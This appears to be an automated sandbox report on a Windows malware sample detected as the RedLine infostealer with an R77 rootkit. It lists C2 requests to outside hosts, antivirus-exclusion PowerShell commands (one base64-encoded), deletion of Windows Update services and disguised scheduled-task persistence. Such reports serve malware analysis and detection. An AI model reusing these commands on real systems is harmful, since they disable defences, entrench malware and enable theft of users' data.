Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: AppLaunch.exe, 00000002.00000002.448431882.0000000008421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb
Source: Loader.exe, Loader.exe, 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmp, Loader.exe, 00000000.00000003.256139180.0000000000A92000.00000040.00001000.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: AppLaunch.exe, 00000002.00000002.448431882.0000000008421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: AppLaunch.exe, 00000002.00000002.448431882.0000000008421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: AppLaunch.exe, 00000002.00000002.439855557.00000000083B3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.436948253.0000000008396000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.420410761.000000000741C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.422756664.00000000074A9000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.448431882.0000000008421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: AppLaunch.exe, 00000002.00000002.448431882.0000000008421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: AppLaunch.exe, 00000002.00000002.415836138.00000000072A6000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412233774.000000000721E000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.416153323.00000000072BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ezisc.com
Source: AppLaunch.exe, 00000002.00000002.412233774.000000000721E000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.415686330.00000000072A3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ezisc.com/dmi1dfg7n.iujgy
Source: AppLaunch.exe, 00000002.00000002.412233774.000000000721E000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ezisc.com/ofg7dfg312.wretg
Source: AppLaunch.exe, 00000002.00000002.412233774.000000000721E000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.416153323.00000000072BA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ezisc.com/sdfs34nh.hjhk
Source: AppLaunch.exe, 00000002.00000002.415836138.00000000072A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ezisc.com4tkDt
Source: AppLaunch.exe, 00000002.00000002.416153323.00000000072BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ezisc.com4tkh
Source: AppLaunch.exe, 00000002.00000002.412233774.000000000721E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ezisc.com4tkx#&
Source: AppLaunch.exe, 00000002.00000002.439855557.00000000083B3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.436948253.0000000008396000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.420410761.000000000741C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.422756664.00000000074A9000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.448431882.0000000008421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: AppLaunch.exe, 00000002.00000002.439855557.00000000083B3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.436948253.0000000008396000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.420410761.000000000741C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.422756664.00000000074A9000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.448431882.0000000008421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: AppLaunch.exe, 00000002.00000002.439855557.00000000083B3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.448431882.0000000008421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: AppLaunch.exe, 00000002.00000002.439855557.00000000083B3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.436948253.0000000008396000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.420410761.000000000741C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.422756664.00000000074A9000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.448431882.0000000008421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: AppLaunch.exe, 00000002.00000002.439855557.00000000083B3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.436948253.0000000008396000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.420410761.000000000741C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.422756664.00000000074A9000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.448431882.0000000008421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

DNS traffic detected: queries for: api.ip.sb

Source: global traffic	HTTP traffic detected: GET /ofg7dfg312.wretg HTTP/1.1Host: ezisc.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dmi1dfg7n.iujgy HTTP/1.1Host: ezisc.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /sdfs34nh.hjhk HTTP/1.1Host: ezisc.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/online?guid=computer\user&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46 HTTP/1.1Host: clipper.guruUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /bot/regex?key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46 HTTP/1.1Host: clipper.guruUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /bot/online?guid=computer\user&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46 HTTP/1.1Host: clipper.guruUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /bot/regex?key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46 HTTP/1.1Host: clipper.guruUser-Agent: Go-http-client/1.1Accept-Encoding: gzip

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724

Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112
Source: unknown	TCP traffic detected without corresponding DNS query: 79.137.204.112

Source: unknown

HTTPS traffic detected: 35.213.155.151:443 -> 192.168.2.7:49713 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 17.2.svcupdater.exe.19c33010000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 0.2.Loader.exe.ae0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.2.svcupdater.exe.19c32fe0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 0.3.Loader.exe.a90000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.2.svcupdater.exe.19c32fe0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 0.2.Loader.exe.b14780.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.2.svcupdater.exe.19c33010000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 00000011.00000002.551221495.0000019C33010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 00000011.00000002.551047553.0000019C32FE0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown

Uses powercfg.exe to modify the power settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0

Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00AE36C0	0_2_00AE36C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00AFA089	0_2_00AFA089
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00B01AF3	0_2_00B01AF3
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00AFE42E	0_2_00AFE42E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00B01C13	0_2_00B01C13
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00AFFEAA	0_2_00AFFEAA
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00AF06C0	0_2_00AF06C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00AEDE7B	0_2_00AEDE7B
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00AF4E49	0_2_00AF4E49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_2_053E0908	2_2_053E0908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_2_0AC2EB00	2_2_0AC2EB00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_2_0AC2BEE0	2_2_0AC2BEE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_2_0AC21CA8	2_2_0AC21CA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_2_0AC20CB0	2_2_0AC20CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_2_0AC2E2E8	2_2_0AC2E2E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_2_0AC22248	2_2_0AC22248
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_2_0AC20040	2_2_0AC20040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_2_0AC211E8	2_2_0AC211E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_2_0AC2D588	2_2_0AC2D588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_2_0AC28A88	2_2_0AC28A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_2_0AC28A77	2_2_0AC28A77
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_2_0AC2A8D0	2_2_0AC2A8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_2_0AC21C98	2_2_0AC21C98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_2_0AC20CA0	2_2_0AC20CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_2_0AC2E2DB	2_2_0AC2E2DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_2_0AC2A3A0	2_2_0AC2A3A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_2_0AC211D9	2_2_0AC211D9

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

Source: updater.exe.18.dr	Static PE information: Number of sections : 11 > 10
Source: brave.exe.2.dr	Static PE information: Number of sections : 11 > 10

Source: Joe Sandbox View	Dropped File: C:\Program Files\Google\Chrome\updater.exe 9C01D90543458567C4737731EE6754CC209E4BB78FF648EB75C4D23BE261EF2F
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\brave.exe 78E0A8309BC850037E12C2D72A5B0843DCD8B412A0A597C2A3DCBD44E9F3C859

Source: Loader.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 17.2.svcupdater.exe.19c33010000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 0.2.Loader.exe.ae0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.2.svcupdater.exe.19c32fe0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 0.3.Loader.exe.a90000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.2.svcupdater.exe.19c32fe0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 0.2.Loader.exe.b14780.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.2.svcupdater.exe.19c33010000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 00000011.00000002.551221495.0000019C33010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 00000011.00000002.551047553.0000019C32FE0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File deleted: C:\Windows\Temp\__PSScriptPolicyTest_i4uzyq5i.w3m.ps1

Source: C:\Windows\System32\dialer.exe

File created: C:\Windows\Tasks\dialersvc32.job

Source: C:\Users\user\Desktop\Loader.exe

Code function: String function: 00AE9A40 appears 48 times

Source: 3A08.tmp.18.dr

Static PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

Source: Loader.exe	Binary or memory string: OriginalFilename vs Loader.exe
Source: Loader.exe, 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameProlongate.exe4 vs Loader.exe
Source: Loader.exe, 00000000.00000003.256160955.0000000000AB4000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameProlongate.exe4 vs Loader.exe

Source: Loader.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

File created: C:\Users\user\AppData\Local\Yandex

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@69/28@8/3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\brave.exe

File created: C:\Program Files\Google\Chrome\updater.exe

Jump to behavior

Source: Loader.exe	ReversingLabs: Detection: 65%
Source: Loader.exe	Virustotal: Detection: 60%

Source: C:\Users\user\Desktop\Loader.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Loader.exe C:\Users\user\Desktop\Loader.exe
Source: C:\Users\user\Desktop\Loader.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Loader.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: C:\Users\user\AppData\Local\Microsoft\ofg.exe "C:\Users\user\AppData\Local\Microsoft\ofg.exe"
Source: C:\Users\user\AppData\Local\Microsoft\ofg.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe "/C schtasks /create /tn \ipNnOYSRDI /tr \"C:\Users\user\AppData\Roaming\ipNnOYSRDI\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn \ipNnOYSRDI /tr \"C:\Users\user\AppData\Roaming\ipNnOYSRDI\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ipNnOYSRDI\svcupdater.exe C:\Users\user\AppData\Roaming\ipNnOYSRDI\svcupdater.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: C:\Users\user\AppData\Local\Microsoft\brave.exe "C:\Users\user\AppData\Local\Microsoft\brave.exe"
Source: C:\Users\user\AppData\Local\Microsoft\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: C:\Users\user\AppData\Local\Microsoft\setup.exe "C:\Users\user\AppData\Local\Microsoft\setup.exe"
Source: C:\Users\user\AppData\Local\Microsoft\setup.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -enC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAnAEMAOgBcAFUAcwBlAHIAcwBcAFIAZQB2AGUAbABpAG4AJwAsACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACcAKQAgAC0ARgBvAHIAYwBlAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Microsoft\brave.exe	Process created: C:\Windows\System32\cmd.exe cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Users\user\AppData\Local\Microsoft\brave.exe	Process created: C:\Windows\System32\cmd.exe cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Microsoft\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
